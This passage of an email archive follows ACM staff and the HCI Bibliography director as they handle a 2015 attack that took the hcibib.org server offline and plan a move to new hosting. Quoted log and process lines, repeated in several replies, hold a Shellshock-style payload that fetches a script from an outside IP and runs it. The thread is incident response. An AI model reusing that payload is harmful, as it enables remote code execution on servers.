ZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkOyBjaGFyc2V0PVVURi04IC1IIEFj Y2VwdDogdGV4dC9qYXZhc2NyaXANCnQsIHRleHQvaHRtbCwgYXBwbGljYXRpb24veG1sLCB0ZXh0 L3htbCwgKi8qIC1IIFJlZmVyZXI6IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tLyAtSCBYLVJlcXVl c3RlZC1XaXRoOiBYTUxIdHRwUmVxdWVzdCAtSCBDb25uZWN0aW9uOiBrZWVwLWFsaXZlIC0tZGF0 YSBzb3J0PXImbmFtZT1lYWZlJnZpZGVvPQ0KJnJldmlldz0maXNfb25saW5lX25vdz0mIC0tY29t cHJlc3NlZA0KYXBhY2hlICAgMjcxMjIgIDAuMCAgMC4wICA0NjI0IDE2MDAgPyAgICAgICAgUyAg ICAxNzo0MiAgIDA6MDAgY3VybCBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS9lc2NvcnRzP2FqYXgg LUggQ29va2llOiBzaG93RmlsdGVyPXRydWU7IHNvcnRpbmc9cjsgc29ydGluZ01hcD1yYW5kb207 IFBIUFNFU1NJRD02DQo0NzZlNWFhZmJmMTZlMzQ3MmY3OTJjN2I1YzAxNzkxOyAxOD0xOyBsbj1l biAtSCBPcmlnaW46IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tIC1IIEFjY2VwdC1MYW5ndWFnZTog cm8sZW4tVVM7cT0wLjgsZW47cT0wLjYscnU7cT0wLjQgLUggVXNlci1BZ2VudDogTW96aWxsYS81 LjAgKFdpbmRvd3MgTlQgNi4NCjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzAuOTkgKEtIVE1MLCBs aWtlIEdlY2tvKSBDaHJvbWUvNDAuMS43NzEuMTE5IFNhZmFyaS81MzcuMjYgLUggQ29udGVudC10 eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTggLUgg QWNjZXB0OiB0ZXh0L2phdmFzY3JpcA0KdCwgdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94bWwsIHRl eHQveG1sLCAqLyogLUggUmVmZXJlcjogaHR0cDovL3d3dy42YW5ub25jZS5jb20vIC1IIFgtUmVx dWVzdGVkLVdpdGg6IFhNTEh0dHBSZXF1ZXN0IC1IIENvbm5lY3Rpb246IGtlZXAtYWxpdmUgLS1k YXRhIHNvcnQ9ciZuYW1lPWJiY2EmdmlkZW89DQomcmV2aWV3PSZpc19vbmxpbmVfbm93PSYgLS1j b21wcmVzc2Vk --_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_-- From greenberg@hq.acm.org Fri May 8 23:42:14 2015 Return-Path: Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1bon0084.outbound.protection.outlook.com [157.56.111.84]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t493gELa004931 for ; Fri, 8 May 2015 23:42:14 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1836.namprd05.prod.outlook.com (25.163.141.15) with Microsoft SMTP Server (TLS) id 15.1.154.19; Sat, 9 May 2015 03:42:18 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Sat, 9 May 2015 03:42:18 +0000 From: Adam Greenberg To: Gary PERLMAN CC: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrA= Date: Sat, 9 May 2015 03:42:16 +0000 Message-ID: References: In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1836; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1836;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1836; x-forefront-prvs: 05715BE7FD x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6019001)(6009001)(269900001)(24454002)(377454003)(43234003)(13464003)(51704005)(40100003)(102836002)(46102003)(122556002)(19580395003)(77156002)(62966003)(15975445007)(87936001)(5890100001)(50986999)(15395725005)(2656002)(19580405001)(66066001)(76176999)(54356999)(74316001)(5001960100002)(76576001)(189998001)(110136002)(33656002)(86362001)(5001920100001)(2900100001)(92566002)(2950100001)(99286002)(344275003);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1836;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 03:42:16.5661 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1836 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t493gELa004931 Status: R X-Status: A X-Keywords: Ok. What I would like to do then, is move you off of this old turing server and over to our newer hosting environment. Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server. Once Gary checks to make sure it works correctly we can cut DNS over. There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again. On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server. Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website. Thanks Adam -----Original Message----- From: Gary PERLMAN [mailto:perlman@turing.acm.org] Sent: Friday, May 08, 2015 6:50 PM To: Adam Greenberg Cc: Ken Bauer; ishelpdesk Subject: Re: hcibib.org website problem Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks. Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org http://hcibib.org/ On Wed, 6 May 2015, Adam Greenberg wrote: > Hello Gary, > I had to take the hcibib.org website offline tonight. The site was used to execute a denial of service attack that took down the server. > Here is the reference from the hcibib.org weblogs > > 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" > > I put the entire weblog for today to your /home/Perlman > > The request executed a denial of service attack that started this. > apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 > > Attached is a sample of what was running on the server. > > I have changed the default document root of the website until I hear from you. I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine you site and then we can open it back up. Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes. > > Thanks > Adam > > > Adam Greenberg > Senior Systems Analyst > Association for Computing Machinery > 2 Penn Plaza > Suite 701 > New York, NY 10121 > Office: 212-626-0573 > greenberg@acm.org > > -- From greenberg@hq.acm.org Sat May 9 10:06:09 2015 Return-Path: Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1on0062.outbound.protection.outlook.com [157.56.110.62]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49E66Ir008286 for ; Sat, 9 May 2015 10:06:07 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1834.namprd05.prod.outlook.com (25.163.141.148) with Microsoft SMTP Server (TLS) id 15.1.154.19; Sat, 9 May 2015 14:06:11 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Sat, 9 May 2015 14:06:11 +0000 From: Adam Greenberg To: Gary PERLMAN CC: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyA Date: Sat, 9 May 2015 14:06:10 +0000 Message-ID: References: In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1834; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1834;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1834; x-forefront-prvs: 05715BE7FD x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6019001)(6009001)(269900001)(51704005)(377454003)(24454002)(43234003)(102836002)(66066001)(76176999)(33656002)(87936001)(15395725005)(19580395003)(54356999)(50986999)(5890100001)(2900100001)(92566002)(86362001)(2950100001)(74316001)(15975445007)(122556002)(110136002)(62966003)(46102003)(40100003)(2656002)(77156002)(19580405001)(76576001)(5001960100002)(99286002)(189998001)(344275003);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1834;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 14:06:10.6715 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1834 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t49E66Ir008286 Status: R X-Status: A X-Keywords: Ok. Great. Let us know if you need any assistance. Thanks Adam -----Original Message----- From: Gary PERLMAN [mailto:perlman@turing.acm.org] Sent: Saturday, May 09, 2015 9:59 AM To: Adam Greenberg Cc: Ken Bauer; ishelpdesk Subject: RE: hcibib.org website problem I am very sorry to have been unwittingly invovled in shutting down acm.org! I'm a little embarassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an acocunt (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress. I will work on the file transfers today. Gary On Sat, 9 May 2015, Adam Greenberg wrote: > Ok. What I would like to do then, is move you off of this old turing server and over to our newer hosting environment. > Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server. > Once Gary checks to make sure it works correctly we can cut DNS over. > There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again. > On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server. > > Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website. > > Thanks > Adam > > -----Original Message----- > From: Gary PERLMAN [mailto:perlman@turing.acm.org] > Sent: Friday, May 08, 2015 6:50 PM > To: Adam Greenberg > Cc: Ken Bauer; ishelpdesk > Subject: Re: hcibib.org website problem > > Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks. > > Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org http://hcibib.org/ > > On Wed, 6 May 2015, Adam Greenberg wrote: > >> Hello Gary, >> I had to take the hcibib.org website offline tonight. The site was used to execute a denial of service attack that took down the server. >> Here is the reference from the hcibib.org weblogs >> >> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" >> >> I put the entire weblog for today to your /home/Perlman >> >> The request executed a denial of service attack that started this. >> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >> >> Attached is a sample of what was running on the server. >> >> I have changed the default document root of the website until I hear from you. I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine you site and then we can open it back up. Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes. >> >> Thanks >> Adam >> >> >> Adam Greenberg >> Senior Systems Analyst >> Association for Computing Machinery >> 2 Penn Plaza >> Suite 701 >> New York, NY 10121 >> Office: 212-626-0573 >> greenberg@acm.org >> >> > > -- From greenberg@hq.acm.org Sat May 9 10:13:45 2015 Return-Path: Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1on0094.outbound.protection.outlook.com [157.56.110.94]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49EDi0m009407 for ; Sat, 9 May 2015 10:13:44 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) with Microsoft SMTP Server (TLS) id 15.1.160.19; Sat, 9 May 2015 14:13:48 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Sat, 9 May 2015 14:13:48 +0000 From: Adam Greenberg To: Gary PERLMAN Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAABCTVA== Date: Sat, 9 May 2015 14:13:48 +0000 Message-ID: References: , In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1241; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1241;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1241; x-forefront-prvs: 05715BE7FD x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6019001)(269900001)(51704005)(43234003)(479174004)(24454002)(377454003)(19580405001)(19580395003)(15975445007)(102836002)(450100001)(77156002)(62966003)(40100003)(92566002)(66066001)(19625215002)(86362001)(189998001)(46102003)(110136002)(5001960100002)(107886002)(2950100001)(2900100001)(5890100001)(50986999)(95246002)(15395725005)(16236675004)(87936001)(99286002)(122556002)(63666004)(76176999)(33646002)(19617315012)(2656002)(54356999)(256605007);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1241;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: multipart/alternative; boundary="_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 14:13:48.3495 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1241 Status: R X-Status: X-Keywords: --_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable SSH isn't running on standard port on the new server. Try using port 7822 Thanks Adam -------- Original message -------- From: Gary PERLMAN Date: 05/09/2015 10:12 AM (GMT-05:00) To: Adam Greenberg Cc: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem File transfer via SSH keeps failing. Do you know what parameters I need to = connect to turing with FileZilla? Gary On Sat, 9 May 2015, Adam Greenberg wrote: > Ok. Great. > Let us know if you need any assistance. > > Thanks > Adam > > -----Original Message----- > From: Gary PERLMAN [mailto:perlman@turing.acm.org] > Sent: Saturday, May 09, 2015 9:59 AM > To: Adam Greenberg > Cc: Ken Bauer; ishelpdesk > Subject: RE: hcibib.org website problem > > I am very sorry to have been unwittingly invovled in shutting down acm.or= g! > > I'm a little embarassed on this, but a move to a new hosting env has been= "in the works" since at least last September, when I was given an acocunt = (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but = I think I can make progress. > > I will work on the file transfers today. > > Gary > > On Sat, 9 May 2015, Adam Greenberg wrote: > >> Ok. What I would like to do then, is move you off of this old turing se= rver and over to our newer hosting environment. >> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get = Gary Perlman setup on the new server, and all the files from the hcibib.org= website synced over to the new server. >> Once Gary checks to make sure it works correctly we can cut DNS over. >> There are more filters and controls in place on the new environment, tha= t would help mitigate the issue should it happen again. >> On the current server, this issue shut down this whole box, along with A= CM's main website, because it tied up the resources of this server. >> >> Ishelpdesk, please proceed with getting an account setup for Gary, and s= etting it up to support the hcibib.org website. >> >> Thanks >> Adam >> >> -----Original Message----- >> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >> Sent: Friday, May 08, 2015 6:50 PM >> To: Adam Greenberg >> Cc: Ken Bauer; ishelpdesk >> Subject: Re: hcibib.org website problem >> >> Well, I am stumped. I don't know what script was used for the attack, an= d if I did, I am not sure how I would prevent further attacks. >> >> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.= org http://hcibib.org/ >> >> On Wed, 6 May 2015, Adam Greenberg wrote: >> >>> Hello Gary, >>> I had to take the hcibib.org website offline tonight. The site was us= ed to execute a denial of service attack that took down the server. >>> Here is the reference from the hcibib.org weblogs >>> >>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 107= 40 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://= 62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/d= d1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" >>> >>> I put the entire weblog for today to your /home/Perlman >>> >>> The request executed a denial of service attack that started this. >>> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tm= p/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http= ://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >>> >>> Attached is a sample of what was running on the server. >>> >>> I have changed the default document root of the website until I hear fr= om you. I would prefer to bring the site back online restricted to the IP = address that you will be connecting from so that you have time to properly = examine you site and then we can open it back up. Please let me know the I= P address you will be connecting from and I will make the appropriate confi= guration changes. >>> >>> Thanks >>> Adam >>> >>> >>> Adam Greenberg >>> Senior Systems Analyst >>> Association for Computing Machinery >>> 2 Penn Plaza >>> Suite 701 >>> New York, NY 10121 >>> Office: 212-626-0573 >>> greenberg@acm.org >>> >>> >> >> > > -- --_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_ Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable
SSH isn't running on standard port on the new server. Try using port 7= 822



Thanks
Adam


-------- Original message --------
From: Gary PERLMAN <perlman@turing.acm.org>
Date: 05/09/2015 10:12 AM (GMT-05:00)
To: Adam Greenberg <greenberg@hq.acm.org>
Cc: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.or= g>
Subject: RE: hcibib.org website problem

File transfer via SSH keeps failing. Do you know w= hat parameters I need to connect to turing with FileZilla?

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

> Ok. Great.
> Let us know if you need any assistance.
>
> Thanks
> Adam
>
> -----Original Message-----
> From: Gary PERLMAN [mailto:p= erlman@turing.acm.org]
> Sent: Saturday, May 09, 2015 9:59 AM
> To: Adam Greenberg
> Cc: Ken Bauer; ishelpdesk
> Subject: RE: hcibib.org website problem
>
> I am very sorry to have been unwittingly invovled in shutting down acm= .org!
>
> I'm a little embarassed on this, but a move to a new hosting env has b= een "in the works" since at least last September, when I was give= n an acocunt (perlman.hosting.acm.org). At the time, I was overwhelmed by t= he task, but I think I can make progress.
>
> I will work on the file transfers today.
>
> Gary
>
> On Sat, 9 May 2015, Adam Greenberg wrote:
>
>> Ok.  What I would like to do then, is move you off of this ol= d turing server and over to our newer hosting environment.
>> Ishelpdesk is copied on this, I'm asking for us to open a ticket t= o get Gary Perlman setup on the new server, and all the files from the hcib= ib.org website synced over to the new server.
>> Once Gary checks to make sure it works correctly we can cut DNS ov= er.
>> There are more filters and controls in place on the new environmen= t, that would help mitigate the issue should it happen again.
>> On the current server, this issue shut down this whole box, along = with ACM's main website, because it tied up the resources of this server. >>
>> Ishelpdesk, please proceed with getting an account setup for Gary,= and setting it up to support the hcibib.org website.
>>
>> Thanks
>> Adam
>>
>> -----Original Message-----
>> From: Gary PERLMAN [mail= to:perlman@turing.acm.org]
>> Sent: Friday, May 08, 2015 6:50 PM
>> To: Adam Greenberg
>> Cc: Ken Bauer; ishelpdesk
>> Subject: Re: hcibib.org website problem
>>
>> Well, I am stumped. I don't know what script was used for the atta= ck, and if I did, I am not sure how I would prevent further attacks.
>>
>> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org  http://= hcibib.org/
>>
>> On Wed, 6 May 2015, Adam Greenberg wrote:
>>
>>> Hello Gary,
>>> I had to take the hcibib.org website offline tonight. &nb= sp; The site was used to execute a denial of service attack that took down = the server.
>>> Here is the reference from the hcibib.org weblogs
>>>
>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTT= P/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /= tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /t= mp/dd.sh;curl http://62.75.145.250/dd.sh -o /t= mp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>>>
>>> I put the entire weblog for today to your /home/Perlman
>>>
>>> The request executed a denial of service attack that started t= his.
>>> apache   28593     1  0 12:= 12 ?        00:00:00 /bin/bash -c rm -rf= /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /t= mp/dd.sh;curl http://62.75.145.250/dd.sh -o /t= mp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>>
>>> Attached is a sample of what was running on the server.
>>>
>>> I have changed the default document root of the website until = I hear from you.  I would prefer to bring the site back online restric= ted to the IP address that you will be connecting from so that you have tim= e to properly examine you site and then we can open it back up.  Please let me know the IP address you will be conne= cting from and I will make the appropriate configuration changes.
>>>
>>> Thanks
>>> Adam
>>>
>>>
>>> Adam Greenberg
>>> Senior Systems Analyst
>>> Association for Computing Machinery
>>> 2 Penn Plaza
>>> Suite 701
>>> New York, NY 10121
>>> Office: 212-626-0573
>>> greenberg@acm.org
>>>
>>>
>>
>>
>
>

--
--_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_-- From kenbauer@gmail.com Sat May 9 10:14:31 2015 Return-Path: Received: from mail-yk0-f180.google.com (mail-yk0-f180.google.com [209.85.160.180]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49EELdV009529 for ; Sat, 9 May 2015 10:14:30 -0400 Received: by ykep21 with SMTP id p21so27179541yke.3 for ; Sat, 09 May 2015 07:14:26 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:from:date:message-id :subject:to:cc:content-type; bh=MN2Syn6OeNY5TDAnf94ndIoNftsrrDxVd81vH16elss=; b=uRAjNXJ40Akfm4HBtHFsiqMIMqZggCgeokfKUoyciyyU4GDhcTs7FhN8dIARGwlSQs 8KsgAOoCFAjX8By1RuVECaMiDwZWNCBkMh5/w80za8/JW+tJUl76ICLR6c+WbhYBuXYl gFIKauJw1uHVEdafVLIgL1uErLlXBhwGx+dGmrE7DJVulD8z7lGQ6NZkfFrtL059VUr+ jYJeN7CSalplmN3FDnpL94Mco8V8B8d3wsLKLaijjN2LD3lbIcuSSh8LbtcLX2Z5maTZ 5GdtdY5RDDm/VhMDRlX2Q6xbCvZPSmRTvj5thyk5s4Y1QLkX/wewFf+0ofqTRV1nwmOr GRKA== X-Received: by 10.170.197.130 with SMTP id o124mr3066856yke.77.1431180866576; Sat, 09 May 2015 07:14:26 -0700 (PDT) MIME-Version: 1.0 Sender: kenbauer@gmail.com Received: by 10.13.215.147 with HTTP; Sat, 9 May 2015 07:14:06 -0700 (PDT) In-Reply-To: References: From: Ken Bauer Date: Sat, 9 May 2015 09:14:06 -0500 X-Google-Sender-Auth: F-1GmLjrOH_uOYo8kGYhGP9M0hA Message-ID: Subject: Re: hcibib.org website problem To: Gary PERLMAN Cc: Adam Greenberg , ishelpdesk Content-Type: multipart/alternative; boundary=001a113994542968a30515a6c3a6 Status: R X-Status: X-Keywords: --001a113994542968a30515a6c3a6 Content-Type: text/plain; charset=UTF-8 to connect to turing you need to make sure you are using ssh on port 22 On Sat, May 9, 2015 at 9:11 AM, Gary PERLMAN wrote: > File transfer via SSH keeps failing. Do you know what parameters I need to > connect to turing with FileZilla? > > > Gary > > On Sat, 9 May 2015, Adam Greenberg wrote: > > Ok. Great. >> Let us know if you need any assistance. >> >> Thanks >> Adam >> >> -----Original Message----- >> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >> Sent: Saturday, May 09, 2015 9:59 AM >> To: Adam Greenberg >> Cc: Ken Bauer; ishelpdesk >> Subject: RE: hcibib.org website problem >> >> I am very sorry to have been unwittingly invovled in shutting down >> acm.org! >> >> I'm a little embarassed on this, but a move to a new hosting env has been >> "in the works" since at least last September, when I was given an acocunt ( >> perlman.hosting.acm.org). At the time, I was overwhelmed by the task, >> but I think I can make progress. >> >> I will work on the file transfers today. >> >> Gary >> >> On Sat, 9 May 2015, Adam Greenberg wrote: >> >> Ok. What I would like to do then, is move you off of this old turing >>> server and over to our newer hosting environment. >>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get >>> Gary Perlman setup on the new server, and all the files from the >>> hcibib.org website synced over to the new server. >>> Once Gary checks to make sure it works correctly we can cut DNS over. >>> There are more filters and controls in place on the new environment, >>> that would help mitigate the issue should it happen again. >>> On the current server, this issue shut down this whole box, along with >>> ACM's main website, because it tied up the resources of this server. >>> >>> Ishelpdesk, please proceed with getting an account setup for Gary, and >>> setting it up to support the hcibib.org website. >>> >>> Thanks >>> Adam >>> >>> -----Original Message----- >>> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >>> Sent: Friday, May 08, 2015 6:50 PM >>> To: Adam Greenberg >>> Cc: Ken Bauer; ishelpdesk >>> Subject: Re: hcibib.org website problem >>> >>> Well, I am stumped. I don't know what script was used for the attack, >>> and if I did, I am not sure how I would prevent further attacks. >>> >>> Gary Perlman, Director, HCI Bibliography Project mailto: >>> director@hcibib.org http://hcibib.org/ >>> >>> On Wed, 6 May 2015, Adam Greenberg wrote: >>> >>> Hello Gary, >>>> I had to take the hcibib.org website offline tonight. The site was >>>> used to execute a denial of service attack that took down the server. >>>> Here is the reference from the hcibib.org weblogs >>>> >>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 >>>> 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget >>>> http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl >>>> http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh >>>> /tmp/dd1.sh 0>&1'" >>>> >>>> I put the entire weblog for today to your /home/Perlman >>>> >>>> The request executed a denial of service attack that started this. >>>> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf >>>> /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O >>>> /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh >>>> /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >>>> >>>> Attached is a sample of what was running on the server. >>>> >>>> I have changed the default document root of the website until I hear >>>> from you. I would prefer to bring the site back online restricted to the >>>> IP address that you will be connecting from so that you have time to >>>> properly examine you site and then we can open it back up. Please let me >>>> know the IP address you will be connecting from and I will make the >>>> appropriate configuration changes. >>>> >>>> Thanks >>>> Adam >>>> >>>> >>>> Adam Greenberg >>>> Senior Systems Analyst >>>> Association for Computing Machinery >>>> 2 Penn Plaza >>>> Suite 701 >>>> New York, NY 10121 >>>> Office: 